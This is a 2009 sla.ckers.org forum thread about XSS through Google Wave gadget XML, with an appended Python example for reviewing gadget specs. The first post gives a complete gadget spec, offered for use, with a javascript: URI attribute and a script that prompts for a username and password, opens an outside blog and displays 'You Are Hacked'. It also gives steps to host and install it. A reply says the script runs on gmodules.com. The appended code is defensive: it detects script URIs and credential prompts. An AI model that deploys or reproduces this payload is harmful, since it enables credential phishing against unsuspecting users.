Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
google wave XSS
Posted by: ejoker
Date: December 05, 2009 06:11AM

I have a Google Wave account and am trying to develop some gadgets...
With an XML file, Google gadgets support JavaScript!
So we can do a lot of boom with this feature!

Just try:


<Module>
<ModulePrefs title="Google Talk" description="See your contacts and send instant messages." author="Google Talk Team" author_affiliation="Google, Inc." author_location="Kirkland, WA" screenshot="javascript:alert(/XSS! document.domain=/.source+document.domain)" thumbnail="http://talkgadget.google.com/talkgadget/googletalk-thm.png" category="communication" category2="tools" height="451" render_inline="optional">
<Locale lang="en" country="us"/>
</ModulePrefs>
<Content type="html">
<![CDATA[
<script type="text/javascript">
var uname=prompt("Enter Your Username");
var pass=prompt("Enter Your Password");
window.open("http://jaiminbhagat.wordpress.com");
alert("You Are Hacked By Ejoker....Muhahahahha");
</script>

]]>
</Content>
</Module>


Copy this and save it as an .xml file,
upload it to any free hosting site,
and add that URL to Google Wave gadgets!
You can do a lot more things with this feature!
If you haven't got a Wave ID, request one from me here or on my blog:
http://jaiminbhagat.wordpress.com

Re: google wave XSS
Posted by: sirdarckcat
Date: December 06, 2009 08:55PM

Not XSS on Google Wave... it is XSS on gmodules.com, and Google doesn't care.
http://ha.ckers.org/blog/20070817/xss-hole-in-google-apps-is-expected-behavior/

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 12/06/2009 08:55PM by sirdarckcat.
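
The reply above separates script that runs on the gadget-rendering domain from script that runs on the Wave page itself; a pre-install review of a gadget spec can check both what the spec contains and which origin it would execute in. The Python below is an added example, not part of the thread and not Google tooling: `review_gadget`, `same_origin`, the finding names and the `wave.example` host are hypothetical, and the sample spec is constructed with placeholder URLs.

```python
import re
import xml.etree.ElementTree as ET  # for untrusted specs, a hardened parser such as defusedxml is preferable
from urllib.parse import urlsplit

# Constructed sample modelled on the spec in the first post (placeholder URLs).
SAMPLE_SPEC = """<Module>
<ModulePrefs title="Demo" screenshot="javascript:alert(document.domain)"
             thumbnail="http://example.com/thumb.png" height="451"/>
<Content type="html"><![CDATA[
<script type="text/javascript">
var uname = prompt("Enter Your Username");
window.open("http://example.com/");
</script>
]]></Content>
</Module>"""

SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")
CONTENT_CHECKS = {  # hypothetical finding names
    "inline-script": re.compile(r"<script\b", re.I),
    "credential-prompt": re.compile(r"\bprompt\s*\(", re.I),
    "opens-window": re.compile(r"\bwindow\.open\s*\(", re.I),
}

def review_gadget(spec_xml):
    """Return sorted finding codes for one gadget spec."""
    root = ET.fromstring(spec_xml)
    findings = set()
    for prefs in root.iter("ModulePrefs"):
        for name, value in prefs.attrib.items():
            # URL parsers ignore tabs/newlines and leading control characters.
            compact = re.sub(r"[\s\x00-\x1f]+", "", value).lower()
            if compact.startswith(SCRIPT_SCHEMES):
                findings.add("script-uri:" + name)
    for content in root.iter("Content"):
        for code, pattern in CONTENT_CHECKS.items():
            if pattern.search(content.text or ""):
                findings.add(code)
    return sorted(findings)

def origin(url):
    """(scheme, host, port) tuple that the same-origin policy compares."""
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port or {"http": 80, "https": 443}.get(parts.scheme))

def same_origin(a, b):
    return origin(a) == origin(b)

if __name__ == "__main__":
    print(review_gadget(SAMPLE_SPEC))
    print(same_origin("http://gmodules.com/ifr", "https://wave.example/"))
```

A `False` from `same_origin` means the same-origin policy keeps gadget script away from the host page's DOM and cookies, while findings such as `credential-prompt` show the gadget can still present its own prompts to the user.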
